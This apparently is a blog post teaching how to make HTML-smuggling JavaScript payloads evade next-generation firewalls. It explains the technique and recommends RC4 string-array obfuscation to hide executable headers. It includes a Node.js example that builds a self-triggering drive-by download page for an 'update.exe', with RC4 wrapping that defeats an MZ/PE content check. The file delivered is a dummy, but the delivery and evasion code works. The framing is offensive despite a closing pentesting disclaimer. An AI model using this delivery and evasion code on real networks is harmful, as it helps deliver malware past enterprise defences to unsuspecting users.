Creating Fully Undetectable JavaScript Payloads to Evade Next-Generation Firewalls

by Prapattimynk, Wednesday, 16 August 2023

In today’s short blog post, we will be covering how to make any JavaScript payload fully undetectable!

This works great for evading detection of any offensive security tool you can find on GitHub that outputs JavaScript.

File introspection aimed at blocking or detecting EXEs, scripts and other downloads is a common feature of the next-generation firewalls (NGFWs) that enterprises widely deploy. To get around this control, attackers commonly use a technique known as HTML smuggling. Rather than serving the malicious file directly, the attacker serves an HTML page whose JavaScript carries the file as an encoded string; the browser decodes that string and reconstructs the file on the client side (typically as a Blob handed to a download link), so nothing that looks like an executable ever crosses the wire. As usual, the target simply sees a file being downloaded and is none the wiser about the sneaky way in which we delivered it!

Image courtesy Microsoft Threat Intelligence.

Email attachments from senders outside an organization are often stripped, which is why the email usually carries only a link to a website, and the website delivers the payload. Most large email providers such as Gmail and Outlook also strip attachments with risky extensions outright.

Naturally, defenders wrote signatures for the JavaScript emitted by these HTML smuggling tools, so that the carrier itself can be detected on the wire even when the final payload cannot:

Above are the VirusTotal detections for one such HTML smuggling project: EmbedInHTML. In practice, an NGFW’s detection rate for this type of payload would be much higher, since the antivirus engines on VirusTotal aren’t geared towards this kind of threat. Even so, we have plenty of unwanted detections.

So, the defenders made a move. Now it’s the attacker’s turn: How do we become fully undetectable (at least… for now)?

Simple: just paste your payload into the obfuscator and click the “Obfuscate” button!

Pro tip: If you’re HTML smuggling a binary file (like an EXE or DLL), definitely select the RC4 encryption option under String Array Encoding. This is necessary to remove the last bits of data that an NGFW might alert on: the structure of an executable (the MZ magic number, the e_lfanew pointer to the PE\0\0 signature and the rest of the PE/COFF headers) showing up inside JavaScript, even behind a layer of base64, is a very strong heuristic, and NGFWs will not like it if they see that. Keep in mind that the RC4 key ships inside the same script, so this is obfuscation rather than encryption: it defeats static signatures, not an analyst who actually runs the page.
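To make the mechanics of the two paragraphs above concrete, here is an added Node.js example; it is not code from the original post, from EmbedInHTML or from the obfuscator the post uses. It builds the client-side decode path of a smuggling page, runs a simple scanner that decodes base64 literals and applies the MZ/PE heuristic, and shows that wrapping the bytes in RC4 (the way the String Array Encoding option does) leaves the scanner nothing to key on while the browser still recovers the file. The function names, the key `wisp-key`, the filename and the sample payload are all assumptions made here; the payload is a constructed dummy header with only the fields the heuristic checks, not a runnable executable.

```javascript
// Added example (not from the original post): the decode path of an HTML-smuggling
// page, the MZ/PE heuristic a scanner can apply to it, and why RC4-wrapping the
// embedded bytes defeats that heuristic. All names, the key and the "payload"
// are constructed for illustration; the payload is a dummy header, not an executable.

// Plain RC4 (KSA + PRGA) over byte arrays. It is used the way obfuscator.io's RC4
// string-array encoding uses it: to make the literal opaque, not to keep a secret,
// because the key is shipped inside the same script.
function rc4(key, data) {
  const S = Uint8Array.from({ length: 256 }, (_, i) => i);
  for (let i = 0, j = 0; i < 256; i++) {
    j = (j + S[i] + key[i % key.length]) & 0xff;
    [S[i], S[j]] = [S[j], S[i]];
  }
  const out = new Uint8Array(data.length);
  for (let k = 0, i = 0, j = 0; k < data.length; k++) {
    i = (i + 1) & 0xff;
    j = (j + S[i]) & 0xff;
    [S[i], S[j]] = [S[j], S[i]];
    out[k] = data[k] ^ S[(S[i] + S[j]) & 0xff];
  }
  return out;
}

// Constructed stand-in for an EXE: 'MZ' at offset 0, e_lfanew at 0x3c pointing to
// 'PE\0\0' at 0x40, zeros elsewhere. It is not loadable; it only carries the
// structure a scanner keys on.
function dummyPe() {
  const buf = new Uint8Array(0x60);
  buf.set([0x4d, 0x5a], 0);
  buf[0x3c] = 0x40;
  buf.set([0x50, 0x45, 0x00, 0x00], 0x40);
  return buf;
}

// Defender-side heuristic from the post: MZ magic, then a PE\0\0 signature at the
// little-endian offset stored in e_lfanew (0x3c).
function looksLikePe(bytes) {
  if (bytes.length < 0x40 || bytes[0] !== 0x4d || bytes[1] !== 0x5a) return false;
  const lfanew = bytes[0x3c] | (bytes[0x3d] << 8) | (bytes[0x3e] << 16) | (bytes[0x3f] << 24);
  if (lfanew < 0 || lfanew + 4 > bytes.length) return false;
  return bytes[lfanew] === 0x50 && bytes[lfanew + 1] === 0x45 &&
         bytes[lfanew + 2] === 0x00 && bytes[lfanew + 3] === 0x00;
}

// Naive content-inspection pass: decode every long base64-looking literal in the
// page and run the PE heuristic on the result. Real NGFW logic is richer, but a
// plain base64 wrapper falls to exactly this kind of check.
function scriptCarriesPe(html) {
  const literals = html.match(/[A-Za-z0-9+\/]{32,}={0,2}/g) || [];
  return literals.some((lit) => looksLikePe(Buffer.from(lit, 'base64')));
}

// Attacker side: an HTML page whose inline script rebuilds the file in the victim's
// browser (Blob + object URL + synthetic click). With no key the bytes are only
// base64-wrapped; with a key they are RC4'd first and the page carries the decoder.
// The inline script runs in the browser, never here in Node.
function buildSmugglingPage(payload, { key = null, filename = 'update.exe' } = {}) {
  const body = key ? rc4(Buffer.from(key), payload) : payload;
  const data = Buffer.from(body).toString('base64');
  const decode = key
    ? `${rc4.toString()}\nbytes = rc4(new TextEncoder().encode(${JSON.stringify(key)}), bytes);`
    : '';
  return `<html><body><script>
var data = "${data}";
var bytes = Uint8Array.from(atob(data), function (c) { return c.charCodeAt(0); });
${decode}
var blob = new Blob([bytes], { type: "application/octet-stream" });
var a = document.createElement("a");
a.href = URL.createObjectURL(blob);
a.download = ${JSON.stringify(filename)};
document.body.appendChild(a);
a.click();
</script></body></html>`;
}

// Run both variants through the scanner, then confirm the browser-side decode of the
// RC4 variant would still yield the original file.
function demo() {
  const pe = dummyPe();
  const key = 'wisp-key'; // constructed key; in practice the obfuscator picks one
  const plainPage = buildSmugglingPage(pe);
  const rc4Page = buildSmugglingPage(pe, { key });
  const carried = rc4Page.match(/var data = "([^"]+)"/)[1];
  const recovered = rc4(Buffer.from(key), Buffer.from(carried, 'base64'));
  return {
    plainFlagged: scriptCarriesPe(plainPage), // true: base64 alone hides nothing
    rc4Flagged: scriptCarriesPe(rc4Page),     // false: no PE structure left to key on
    roundTrip: looksLikePe(recovered),        // true: the victim still gets the file
  };
}

console.log(demo());
```

The scanner here is deliberately simple, but it illustrates why a base64 wrapper alone is not enough: the MZ/PE structure survives decoding unchanged. RC4 with an in-page key does nothing for confidentiality; its only job is to make sure no fixed byte pattern exists in the literal for a signature to match.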

One might think that obfuscating JavaScript in this way would be a huge red flag to NGFWs and other detection software. This would be true in almost any other case like with extensive PowerShell obfuscation or packers for binaries (e.g. antiviruses tend to hate the UPX packer). However, in the world of JavaScript it’s very normal to see heavily minified and sometimes obfuscated scripts to keep file sizes as low as possible for the web and possibly to protect proprietary code. This makes blending in with the vast quantities of those already existing legitimate scripts a very successful strategy.

This information is provided for the purposes of legitimate pentesting, education, and further security research only. Please use it responsibly.

Detection software (such as antivirus, endpoint detection and response, and next-generation firewalls) should only be used as part of a more holistic defense-in-depth security strategy, mostly because security through detection is a cat-and-mouse game. If ‘real’ security is what you want then have a look at my binary exploitation or Qubes OS content (upcoming).

